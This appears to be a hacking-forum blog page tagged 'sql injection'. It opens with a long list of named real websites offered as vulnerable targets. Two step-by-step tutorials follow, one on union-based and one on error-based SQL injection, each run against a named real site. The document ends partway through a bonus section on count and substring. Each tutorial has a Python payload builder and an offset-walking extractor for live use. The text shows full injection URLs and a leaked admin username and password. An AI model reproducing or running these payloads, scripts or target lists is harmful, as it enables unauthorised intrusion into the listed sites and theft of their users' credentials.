Showing posts with label sql injection. Show all posts

SQL vulnerable

http://www.4ips.biz/products.php?id=7
http://www.absolutenorth.co.nz/news_display.php?id=155
http://www.solutionfocusedtrainers.co.uk/trainers.php?id=5
http://www.rockiurbanfitness.com.au/trainers.php?id=8
http://www.arcdi.com/trainers.php?id=30
http://www.youronesourcefitness.com/trainers.php?id=34
http://www.sealfit.com/trainers.php?id=5
http://www.cvc.nl/trainers.php?id=25
http://www.olympiclanden.be/info/trainers.php
http://www.door.nl/trainers.php?id=5
http://www.phpcalendarscripts.com/buy.php?option=2
http://www.phpjabbers.com/buy.php?script=6
http://www.computerandvideogames.com/article.php?id=175552
http://www.nlcnet.org/article.php?id=613
http://www.corpwatch.org/article.php?id=13646
http://www.michaelpollan.com/article.php?id=87
http://www.phpbuddy.com/article.php?id=8
http://www.computerandvideogames.com/article.php?id=203174
http://www.nlcnet.org/article.php?id=562
http://www.michaelpollan.com/article.php?id=80
http://www.soaw.org/article.php?id=205
http://www.unitedforpeace.org/article.php?id=2136
http://www.soaw.org/article.php?id=530
http://www.democracyjournal.org/article.php?ID=6570
http://www.soaw.org/article.php?id=98
http://www.unitedforpeace.org/article.php?id=2854
http://www.democracyjournal.org/article.php?ID=6527
http://www.colorlines.com/article.php?ID=309
http://www.plusline.org/article.php?id=4695
http://www.vcn.com/knowledgebase/article.php?id=422
http://www.all.org/article.php?id=11934
http://www.computerandvideogames.com/article.php?id=215066
http://www.forestethics.org/article.php?id=1176
http://www.onradio.gr/play_old.php?id=388
http://www.j-diocese.org/newsdetail.php?id=3386
http://www.acutech-consulting.com/newsdetail.php?id=61
http://www.wichitafallscommerce.com/newsDetail.php?id=57
http://www.j-diocese.org/newsdetail.php?id=34
http://www.tasouganda.org/newsdetail.php?id=33
http://www.samuseum.org/about/newsdetail.php?uid=34
http://www.maimonides.org/upper/newsDetail.php?id=170
http://www.nayapatrika.com/newsdetail.php?id=807070311492449&n_id=23
http://www.congreso.net/newsdetail.php?id=65
http://www.nayapatrika.com/newsdetail.php?id=807100601595356&n_id=32
http://www.mercurymarine.com/newsandevents/newsdetail.php?ID=30
http://www.leadacidbatteryinfo.org/newsdetail.php?id=44
http://www.mercurymarine.com/newsandevents/newsdetail.php?ID=25
http://www.leadacidbatteryinfo.org/newsdetail.php?id=42
http://www.dpu.org.tw/En/newsDetail.php?Mode=News&ID=2008&ArticleID=50
http://www.e-motionsoftware.com/about/newsdetail.php?ID=2
http://www.komjuniti.com/newsdetail.php?id=102
http://www.bioconceptlabs.com/popup.php?ref=/newsdetail.php?id=12
http://www.epp.eu/newsdetail.php?newsID=434&hoofdmenuID=4&submenuID=49&subsubmenuID=147
http://www.bioconceptlabs.com/popup.php?ref=/newsdetail.php?id=11
http://www.paknavywr.com/newsDetail.php?id=5
http://www.prater.at/NewsDetail.php?Id=1360218
http://www.simoco.net/telecom/newsdetail.php?type=news&id=11
http://www.centralinnovation.co.uk/news/newsdetail.php?nid=1638
http://www.hoefner.ch/newsdetail.php?id=19
http://www.jfdp.org/newsDetail.php?id=8
http://www.hebron.com/english/gallery.php?id=170
http://www.frcphotos.com/gallery.php?id=194
http://www.melbournefineart.com.au/gallery.php?id=20
http://www.cwfarchives.com/Gallery.php?id=12
http://www.jymop.com/gallery.php?id=1919&img=6
http://www.jonbidwell.com/gallery.php?id=jb488
http://www.studiocromie.org/gallery.php?id_art=56&id=216
http://www.egotvonline.com/gallery.php?id=5
http://www.jonbidwell.com/gallery.php?gallery=&id=jb659
http://www.fag1.cn/news/newsone.php?id=38
http://www.fag1.cn/news/newsone.php?id=60
http://www.bbly.clxcpu.cn/newsone.php?id=369&pid=100023
http://www.nskks.cn/news/newsone.php?id=272
http://www.buchakademie.de/sem/sem.php3?id=928
http://www.go-whippet.co.uk/announce.php?id=9
http://www.planetizen.com/mobile/announce.php?id=38824
http://www.planetizen.com/mobile/announce.php?id=38897
http://www.indeliblevision.com/announce.php?mode=view&id=17
http://www.afrii.org/announce.php?id=1
http://www.sisonlgu.gov.ph/announce.php?id=3
http://www.worstpreviews.com/review.php?id=1008
http://www.pixelsurgeon.com/reviews/review.php?id=687
http://www.eyemagazine.com/review.php?id=85&rid=447
http://www.d-kaz.com/reviews/review.php?id=384
http://www.theatreview.co.nz/reviews/review.php?id=2195
http://www.bloody-disgusting.com/review.php?id=561
http://www.pixelsurgeon.com/reviews/review.php?id=268
http://www.bgra.net/2004/review.php?id=501&type=head
http://www.allaboutjazz.com/php/review.php?id=11772
http://www.icehw.net/review.php?id=100
http://www.paranormalromance.org/reviews/review.php?id=29221
http://www.deepintense.com/review.php?id=231
http://www.theatreview.org.nz/reviews/review.php?id=1886
http://www.geilunleashed.com/review.php?id=2
http://www.churchrater.com/review.php?id=257
http://www.chimpomatic.com/reviews/review.php?id=223
http://www.andygrace.com/viewphoto.php?id=41
http://www.chrisroyce.co.uk/album/viewPhoto.php?id=506
http://www.raypang.com/new/cryfield/viewphoto.php?id=208
http://www.evai.de/viewphoto.php?org=area&id=238
http://www.flugsimulatorbilder.de/viewphoto.php?id=28532
http://www.ddc.moph.go.th/showimg.php?id=128
http://www.puutera.com/showimg.php?id=5
http://www.stephensbuilder.com/showimg.php?id=8
http://www.medpharma-ae.com/showimg.php?id=160
http://www.ddc.moph.go.th/showimg.php?id=351
http://www.8op10.be/showimg.php?id=117
http://www.plumeriaexoticdesign.com.au/showImg.php?id=71
http://www.8op10.be/showimg.php?id=68
http://www.motor-europe.com/newscat.php?id=4
http://www.eanm.org/education/edu_facility/ther_dos/curriculum.php?navId=33
http://www.massbioed.org/educators/curriculum.php?page_function=detail&curriculum_id=9
http://www.girlsprep.org/LowerEastside/curriculum.php?id=9
http://www.mansci.uwaterloo.ca/undergrad/program/curriculum.php?id=4
http://www.a.com.mx/curriculum.php?id=25
http://www.salon52.ca/academies/curriculum.php?id=174
http://www.ducatindia.com/curriculum/curriculum.php?id=42
http://www.a.com.mx/curriculum.php?id=4
http://www.accompositors.com/compositores-curriculum.php?idComp=158
http://www.entijuanarte.com/curriculum.php?id=153
http://www.yepp-online.net/curriculum.php?id=46
http://www.yepp-eu.org/curriculum.php?id=56
http://www.americanschoolfes.com/curriculum.php?id=2
http://www.mete.gov.al/galeri_info.php?l=a&p=44&ida=2
http://www.nikollelesi.org/galeri_info.php?l=a&ida=9
http://www.lezha.org/galeri_info.php?lang=AL&idr=309&ida=19
http://www.vanhuberta.co.id/material.php?cat=6
http://www.gkasparov.com/material.php?id=4619D15348175
http://www.fudim.org/seroportunidad/libreria/material.php?id=86
http://www.betanien.de/verlag/material/material.php?id=128
http://www.gbritain.net/humor.php?id=2
http://www.vestibularseriado.com.br/humor.php?id=1
http://www.blogdopastor.com.br/humor.php?subaction=showcomments&id=1185486996
http://www.cartagomola.com/humor.php?id=1
http://www.kupa.pl/pl/humor.php?id=16
http://www.radios.no/humor.php?kategori=2&view=true&id=522
http://www.blamm.com/top10.php?id=28
http://www.barlebao.com/top10.php?id=341
http://www.agroexchange.de/xchange/top10.php?id=1
http://www.esfhm.com/braguetazos/top10.php?id=3
http://www.poblanerias.com/clasificados/clasificados-top10.php?cat=2
http://www.adwelo.de/exchange/top10.php?id=1
http://www.jcquizas.nl/leden.php?id=3
http://www.okea.nl/leden.php?id=91
http://www.vnf-nijmegen.nl/leden.php?id=58
http://www.okea.nl/leden.php?id=64
http://www.businesscluboranjezwart.nl/leden.php?id=47
http://www.mijnsprinters.com/leden/leden.php?id=21
http://www.stchristoffel.nl/leden.php
http://www.businesscluboranjezwart.nl/leden.php?id=24
http://www.fov.nl/content/leden.php?id=102
http://www.uitslaopers.nl/leden.php?id=1
http://www.punch-basketball.nl/leden.php?state=view&id=607
http://www.ovbrm.nl/leden.php?l=leden&id=0015
http://www.vwbusclub.be/leden.php?currentpage=leden&id=10
http://www.talskerwoelfe.de/mitglieder.php?id=12
http://www.vwgoe.at/mitglieder.php?id=201
http://www.dreizunull.net/manager/mitglieder.php?id=103
http://www.bogensport.li/bsv/mitglieder.php?st=3&id=6
http://www.versicherungsverband.li/mitglieder.php?id=5
http://www.fotoclub-dresden.de/mitglieder.php?id=46
http://www.azijnfabriek.nl/nieuws.php?id=137
http://www.nedap.com/nieuws.php?id=30
http://www.somnio.nl/nieuws.php?id=1
http://www.orientatie.org/nieuws.php?id=141
http://www.ampco.be/_nl/nieuws.php?id=14
http://www.comicbase.nl/nieuws.php?ID=574
http://www.friespopnet.nl/nieuws.php?id=844
http://www.iksbv.nl/nieuws.php?ID=18
http://www.zandvoortinbeeld.nl/nieuws.php?id=688
http://www.tijlbeckand.nl/site/nieuws.php?id=61670
http://www.toppigeons.nl/nieuws.php?id=4210
http://www.labyrinthonderzoek.nl/nieuws.php?id=189
http://www.schaatspeloton.nl/nieuws/nieuws.php?id=1128
http://www.willemvdwal.nl/beelden.php?id=7
http://www.liesbettol.nl/galerij.php?id=3
http://www.bwakielce.wici.info/galerie.php?id=4
http://www.irishcob.cz/galerie.php?id=16
http://www.pixheaven.net/galerie.php?id=18
http://www.wiese-immobilien.com/galerie.php?mode=immo_bild&id=37
http://www.labush.com/v4/galerie.php?type=&id=&nb=1
http://www.komiks.cz/galerie.php?action=galerie&id=187
http://www.bbcc.ch/galerie.php?id=15
http://www.ccsh.cz/galerie.php?id=61
http://www.cssd-jicin.cz/galerie.php?id=49
http://www.glamorescort.com/galerie.php?id=178
http://www.isabelle-faucher.com/galerie.php?id=10
http://www.paves-reseau.be/membres.php?p=1&id=1
http://www.aicim.be/main/fr/membres.php?provider=MWA&offset=90
http://www.paves-reseau.be/membres.php?p=1&id=8
http://www.rez-gif.supelec.fr/~sono/membres.php?id=2004
http://www.kiwanisalma.qc.ca/pages/membres.php?id=14
http://www.asp-php.net/tutorial/asp-php/dmx-membres.php?page=2
http://www.ucq-amiens.org/comites/membres.php?id=27
http://www.groupeart.com/membres.php?id=53
http://www.opw.be/membres.php?id=ro6&tid=2&docid=224
http://www.cdpcdc.fr/Membres.php?id=48
http://www.tipsportarena.cz/multifunkcni-areal/hotel.php?lang=en&id=4
https://www.azores.com/reservations/hotel.php?id=4
http://www.sistemalagodicomo.it/hotel.php?id=4
http://www.zeegarden.com/hotel.php?id=4
http://www.solvera.la/hotel.php?id=4
http://www.skifrance.cz/tignes-hotel.php?id=4
http://www.hotelandmore.it/hotel.php/id=4
http://www.info-alberghi.com/hotel.php?id=4
http://www.varazze.com/hotel/hotel.php?id=4
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=4
http://www.info-alberghi.com/hotel.php?id=12
http://www.manos-travel.hu/hotel.php?id=12
http://www.barcatours.sk/hotel.php?id=12
http://www.ogar.cz/2007/hotel.php?stred=aktuality_det&id=12
http://www.olomouc.com/ubytovani/hotel.php?id=12
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=12
http://www.guesthotels.eu/hotel.php?id=12
http://www.aiatour.com/hotel.php?id=5&stars=3
https://www.azores.com/reservations/hotel.php?id=5
http://www.tossahoteles.com/hotel.php?id=5
http://www.sanpancrazioviaggi.it/front/it/hotel.php?id=5
http://www.dreamtravel.bg/hotel.php?id=5
http://www.varazze.com/hotel/hotel.php?id=5
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=5
http://www.bountyclub.dk/hotel.php?id=5
http://www.conference-halls.com/hotel.php?id=6
http://www.nextholidaysrilanka.com/hotel.php?id=6
http://www.teztour.bg/hotel.php?id=6
http://www.manos-travel.hu/hotel.php?id=6
http://www.rexhotels.it/ita/hotel.php?id=6
http://www.sistemalagodicomo.it/hotel.php?id=6
http://www.sanpancrazioviaggi.it/front/it/hotel.php?id=6
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=6
http://www.gamatours-mg.com/hotel.php?page=1&id=6
http://www.corpotour.ru/hotel.php?id=6
http://www.aiatour.com/hotel.php?id=7&stars=3
http://www.conference-halls.com/hotel.php?id=7
http://www.sunoceanmaldives.com/resorts-hotel.php?id=7
http://www.tossahoteles.com/hotel.php?id=7
http://www.manos-travel.hu/hotel.php?id=7
http://www.info-alberghi.com/hotel.php?id=7
http://www.teztour.bg/hotel.php?id=7
http://www.info-alberghi.com/fr/hotel.php?id=7
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=7
http://www.sistemalagodicomo.it/hotel.php?id=7
http://www.swts.ru/hotels/hotel.php?id=7
http://www.condorferries.fr/GLOBAL/pages/week-end_et_sejours/hotel.php?id=7
http://www.apps2009.com/images.php?id=2
http://www.xtraflex.nl/ht2/images.php?imggroep=gr1&ID=2&taal=du&ID=4
http://www.onf-nfb.gc.ca/fra/collection/film/galerie-images.php?id=2
http://www.connexion.fm/images.php?lang=fr&id=2
http://www.tu-sofia.bg/Bul/faculties/mtf/tmmm/consortium/templates/images.php?LNG=bg&id=2
http://www.suteatar.org/images.php?id=2
http://www.sokit.cz/images.php?id=3&img=4
http://www.990000.com/images.php?id=3
http://www.millerkittredge.com/pictures/elwood/images.php?id=3
http://www.seeb.net.pl/portfolio/images.php?id=3
http://www.suteatar.org/images.php?id=3
http://www.nexxrattan.hu/images.php?id=3
http://www.tu-sofia.bg/Bul/faculties/mtf/tmmm/consortium/templates/images.php?LNG=bg&id=3
http://www.fleuraugustinus.nl/images.php?id=3
http://www.oobgolf.com/golfers/images.php?id=4
http://www.990000.com/images.php?id=4
http://www.granitestatemillworks.com/files/images.php?ID=4
http://www.guilhermedesigner.net/images.php?id=4
http://www.onf-nfb.gc.ca/fra/collection/film/galerie-images.php?id=4
http://www.nexxrattan.hu/images.php?id=4
http://www.990000.com/images.php?id=5
http://www.ms-hariri.com/images.php?id=5
http://www.bedandbreakfast-gent.be/_en/images.php?id=5
http://www.humourjuif.com/images/images.php?id=5
http://www.nexxrattan.hu/images.php?id=5
http://www.ewno.com/images.php?category=7
http://www.safe.org.nz/images.php?oid=6520
http://www.zabeelinvestments.com/images.php?cat=3
http://www.candycreations.net/images.php?cat=11&page=3
http://www.communipix.com/images.php
http://www.madjokes.co.uk/?page=images.php
http://www.candycreations.net/images.php?cat=17
http://www.brendamurphy.com/images.php?cat=8
http://www.plantdetectives.com/images.php?cat=8
http://www.camp4.com/photos/images.php?user=Unitao
http://www.perspective2013.info/images.php?cat=2
http://www.onf-nfb.gc.ca/eng/collection/film/galerie-images.php?id=16531

Detailed Basic and Full SQL Injection Tutorial


♦ [Updated!] Fully Vulnerable Sites!! #2 [SQLi] ♦♦

Tested most of them, have fun guys <3
A bit more than last time.

http://pastebin.com/pLFq9L9D


[Tutorial] Getting Data From Multiple Databases [SQLi]

So I've been seeing a lot of sites with multiple databases, and since I haven't seen a tutorial on this, I figured it would help out some beginners.

I'll be using this link as an example.
http://www.hubbardbrook.org/people/view.php?id=109'

Once you have your column count and know which columns are vulnerable, the next step is to get the names of the databases.
You can do that with:
Code:
group_concat(schema_name)
&
Code:
from information_schema.schemata

So my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.schemata--

Now I see that there are two databases, one called "hbr" and one called "mysql". Write them down somewhere; next we want to know which one is the default (current) database, the one the application is connected to.

To find out, pick your vulnerable column and use:
Code:
database()
So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--

Now where column 4 was (my vulnerable column), we see "hbr", so that's the current database. Of course you'd want to search it for tables that might hold login info. You get the tables the normal way:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--

There are over 100 tables, but nothing that looks like user info, so now we check the other database. It works almost the same way as listing the tables of the default database, except that we name the schema explicitly. My other database was called "mysql".
To get its tables, we convert the name to hex (a hex literal needs no quote characters, which matters when quotes are escaped or filtered) and use:
Code:
where+table_schema=0xdatabasehexhere
The hex of "mysql" is 6d7973716c.
Always put 0x in front of your hex, so MySQL reads it as a string literal.
Now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=0x6d7973716c--

Now we have the tables from the second database, and there's a table named user!

Now we get the columns of the user table. Keep the table_schema filter for that database: without it you'd also get the columns of any same-named table in other schemas. So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572--

0x75736572 is the hex of "user". So I converted the table name to hex and pulled that table's columns from the second database.
Now we want the data from the columns. It's almost the same again, except for the very last bit.
There are two columns named "User" and "Password", which is what we want.
Build your group_concat as usual, but because the table is not in the current database, the FROM clause has to qualify it with the database name:
Code:
+from+databasename.tablename
So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(User,0x3a,Password,0x0a),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+mysql.user--

And where your vulnerable column was, you now see the logins. Note what this table is: mysql.user is MySQL's own account table, holding the server's usernames and password hashes, so being able to read it means the web application's database account has privileges it never needed (SELECT on the mysql schema).
Hope you guys understood, happy hacking!
Victoire
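The steps above as a small payload builder. This is an added example, not Victoire's code: it only assembles the id= values the tutorial typed by hand. The hubbardbrook.org URL, the 25 columns and vulnerable column 4 are taken from the tutorial; the marker wrapping, the helper names and the sample response fragment are mine. What it adds is the hex literal: MySQL reads 0x6d7973716c as the string 'mysql', so schema and table names travel without quote characters, and wrapping the output in a distinctive marker pair makes it easy to find in whatever HTML comes back.

```python
import re

BASE_URL = "http://www.hubbardbrook.org/people/view.php?id="  # target from the tutorial
NCOLS, VULN_COL, ORIG_ID = 25, 4, 109                           # layout from the tutorial


def hex_literal(text: str) -> str:
    """MySQL hex string literal: 'mysql' -> '0x6d7973716c'. No quotes needed."""
    return "0x" + text.encode("utf-8").hex()


def union_payload(expr: str, from_clause: str = "", ncols: int = NCOLS,
                  vuln_col: int = VULN_COL, orig_id: int = ORIG_ID) -> str:
    """id= value: a negative id so the original row is empty, then UNION SELECT
    with `expr` in the vulnerable column and numbers everywhere else, plus an
    optional FROM/WHERE part, closed with a comment."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[vuln_col - 1] = expr
    tail = f"+{from_clause}" if from_clause else ""
    return f"-{orig_id}+union+select+{','.join(cols)}{tail}--"


# Hex for '[[' and ']]': an unusual marker pair that will not occur in normal page text.
MARK_OPEN, MARK_CLOSE = hex_literal("[["), hex_literal("]]")


def marked(expr: str) -> str:
    """Wrap an expression so its output is bracketed in the response."""
    return f"concat({MARK_OPEN},{expr},{MARK_CLOSE})"


def extract_marked(html: str) -> list[str]:
    """Pull every marked value back out of a response body."""
    return re.findall(r"\[\[(.*?)\]\]", html, flags=re.S)


def enumeration_payloads(other_schema: str, table: str, columns: list[str]) -> dict[str, str]:
    """The requests of the tutorial, in order, for a table in a non-default schema."""
    schema_hex, table_hex = hex_literal(other_schema), hex_literal(table)
    return {
        "schemata": union_payload(marked("group_concat(schema_name)"),
                                  "from+information_schema.schemata"),
        "current_db": union_payload(marked("database()")),
        "tables": union_payload(marked("group_concat(table_name)"),
                                f"from+information_schema.tables+where+table_schema={schema_hex}"),
        "columns": union_payload(marked("group_concat(column_name)"),
                                 f"from+information_schema.columns+where+table_schema={schema_hex}"
                                 f"+and+table_name={table_hex}"),
        # The table lives outside the current database, so FROM must qualify it.
        "rows": union_payload(marked(f"group_concat({',0x3a,'.join(columns)},0x0a)"),
                              f"from+{other_schema}.{table}"),
    }


if __name__ == "__main__":
    for step, value in enumeration_payloads("mysql", "user", ["User", "Password"]).items():
        print(f"{step}: {BASE_URL}{value}")
    # Constructed response fragment, to show the marker extraction:
    print(extract_marked("<td>[[hbr,mysql]]</td>"))
```

Run it and paste each printed URL into the browser in turn; the value you want is whatever sits between [[ and ]] in the returned page, which is what extract_marked() pulls out.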

[X-Mas Special][Tutorial]Error Based Injection [Pics/Detailed][Bonus!]

Introduction

So lately I've been trying to take the time to make an error based tutorial..
I should have had it done a while ago, but I was saving it for my 1337th post!

Anyways, I'll be using this site as an example.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=52

You don't need error based injection for this site, but I'm going to use it anyway, for the tutorial.
Error based injection is really helpful when you run into what I call "stupid errors". Here are a few examples.

Code:
1. The used SELECT statements have a different number of columns.
2. Unknown column '1' in 'order clause' (or 0).
3. Can't find your columns in the page source.
4. Error #1604

The list goes on; it's really useful for times like these.

Getting The Version

What we want to do is force an error that echoes the value we're after. floor(rand(0)*2) returns the same 0/1 sequence on every run because rand() is seeded with 0, and grouping on a key that contains it makes MySQL try to insert the same key twice into the temporary table it builds for GROUP BY. The duplicate-entry error it raises quotes the offending key, and with it whatever we concatenated in. The table we select from needs at least three rows for the collision to happen, which information_schema.tables always has.
Let's check the version before we go after the tables, because if it's less than 5 these queries won't work: information_schema doesn't exist.

Code:
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

So now my url looks like this.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

What we're looking for is the duplicate entry error, and the site gives us one:

Code:
Duplicate entry '5.1.52-log~1' for key 'group_key'


Getting The Table Names

Now we know the server is MySQL 5.1, so information_schema exists and we can use it to get the table names.

So now let's start by getting our table names.

Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHEX+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

So now my link looks like this.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

We get our duplicate entry, which contains the first table name.


Now we have to use limit to get the next table name.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)


Now that we know how to get table names, we keep incrementing the offset in the limit clause until we come across a "juicy" table.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+10,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Oh looky, tbladmin!


Getting The Columns

Now we want the columns of that table. We change the syntax a little and hex our table name.

Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0xHEXOFTABLE+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

So now my link looks like this.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x74626c61646d696e+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Remember that when we hex the table name, 0x always goes in front.
74626c61646d696e is the hex of my table name, tbladmin.

So far we have adminid.


Now we increment the limit offset until we have the columns we want.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x74626c61646d696e+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

That returns username.


Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x74626c61646d696e+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

That returns password.


Getting Data Out Of Columns

So now we have adminid, username, and password.

Now we put those in a concat statement, selecting from the table we want.

Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(column1,0x7e,column2,0x7e,column3)+as+char),0x7e))+from+TABLENAME+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

So now my link looks like this.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(adminid,0x7e,username,0x7e,password)+as+char),0x7e))+from+tbladmin+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

And I get the duplicate entry containing the adminid, username, and password:

Code:
Duplicate entry '1~ishir~ishir123~1' for key 'group_key'
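The same error based walk, scripted. This is an added example and not DownFall's code: it builds the payload suffix the tutorial used, pulls the leaked value out of the duplicate-entry message, and steps through LIMIT offsets until the error stops. The leadacidbatteryinfo.org URL and the payload shape are the tutorial's; the helper names, the constructed table list and the constructed error strings are mine, so the script runs without touching any site.

```python
import re
from typing import Callable, Optional

# Target from the tutorial. Everything below that is marked "constructed" is a stand-in.
BASE_URL = "http://www.leadacidbatteryinfo.org/newsdetail.php?id=52"


def hex_literal(text: str) -> str:
    """MySQL hex string literal, e.g. 'tbladmin' -> '0x74626c61646d696e'."""
    return "0x" + text.encode("utf-8").hex()


def error_based(expr: str, source: str, offset: int) -> str:
    """Suffix for the id= parameter.  `expr` is the column or expression to leak,
    `source` the FROM ... WHERE part it is read from, `offset` the LIMIT offset
    (row number).  floor(rand(0)*2) is a seeded, repeatable 0/1 sequence; grouping
    on a key that contains it makes MySQL insert the same key twice into its
    GROUP BY temporary table, and the duplicate-entry error carries our value back.
    The outer FROM needs at least three rows, which information_schema.tables has."""
    return ("+and+(select+1+from+(select+count(*),concat((select(select+concat(cast("
            f"{expr}+as+char),0x7e))+from+{source}+limit+{offset},1),floor(rand(0)*2))x"
            "+from+information_schema.tables+group+by+x)a)")


# "Duplicate entry 'VALUE~1' for key 'group_key'" (newer servers print '<group_key>').
DUP_ENTRY = re.compile(r"Duplicate entry '(.*)~[01]' for key '[^']*'")


def leaked_value(response: str) -> Optional[str]:
    """The value echoed in a duplicate-entry error, without the trailing ~0/~1."""
    m = DUP_ENTRY.search(response)
    return m.group(1) if m else None


def walk_rows(send: Callable[[str], str], expr: str, source: str, max_rows: int = 500) -> list[str]:
    """Increment the LIMIT offset until the page stops producing the error.
    Past the last row the scalar subquery is NULL, so the group key is NULL,
    and NULL keys never collide: the page comes back normal and we stop."""
    rows = []
    for offset in range(max_rows):
        value = leaked_value(send(error_based(expr, source, offset)))
        if value is None:
            break
        rows.append(value)
    return rows


# --- constructed stand-in for the HTTP request, so this runs offline -------------
FAKE_TABLES = ["tblnews", "tblcontent", "tbladmin"]  # constructed


def simulated_send(suffix: str) -> str:
    """Pretend to fetch BASE_URL + suffix and return the page body."""
    m = re.search(r"\+limit\+(\d+),1\)", suffix)
    offset = int(m.group(1)) if m else 0
    if offset < len(FAKE_TABLES):
        return f"Duplicate entry '{FAKE_TABLES[offset]}~1' for key 'group_key'"
    return "<html>normal page</html>"


if __name__ == "__main__":
    tables_src = "information_schema.tables+where+table_schema=database()"
    print(walk_rows(simulated_send, "table_name", tables_src))
    # The column and data steps only change `expr` and `source`:
    print(BASE_URL + error_based("column_name",
          f"information_schema.columns+where+table_name={hex_literal('tbladmin')}", 0))
    print(BASE_URL + error_based("concat(adminid,0x7e,username,0x7e,password)", "tbladmin", 0))
```

Against a real target, replace simulated_send with a function that does the GET and returns the body; the rest stays the same. The leaked value is split on the ~ separators you put into the concat, which is why 0x7e is a good choice: it is rare in names and hashes.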


BONUS!

I'm going to explain a few functions, so you get a better understanding of what you're actually doing.

The Count Function

This one is pretty obvious: count() returns how many rows match, so it's an easy way to check how many databases, tables or columns there are before you start walking through them. Here's how to use it in each kind of injection.

Let's say 3 is our vulnerable column, out of 5 columns.

Union Based:
Code:
www.site.com/dork.php?id=null+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata--
String Based:
Code:
www.site.com/dork.php?id=null'+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata-- x
Error Based:
Code:
www.site.com/dork.php?id=5+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Blind:
Code:
www.site.com/dork.php?id=5+and+ascii(substring((select+concat(count(schema_name))+from+information_schema.schemata+limit+0,1),1,1))>0

The Substring Function
This is really useful in blind injection, because there you have to get things one character at a time.
It also helps in error based injection: the value quoted in the duplicate-entry error gets cut off when it's long, so you take it in slices. (If what you get instead is "Subquery returns more than 1 row", the fix is a limit clause on the subquery, not substring.)

For example, let's say we want the first letter of the username column, from the admin table.

Code:
substring(string, start position, length)

So let's say the username is admin, and the table name is admin.

Union Based:
Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,1,1)+from+admin--

The returned letter is 'a', the first letter.

Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,1,5)+from+admin--

The returned value is 'admin': five characters starting at position 1.

Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,3,5)+from+admin--

The returned value is 'min'. The third argument is a length, not an end position: this asks for up to five characters starting at position 3, and only three remain.

String Injection:
Code:
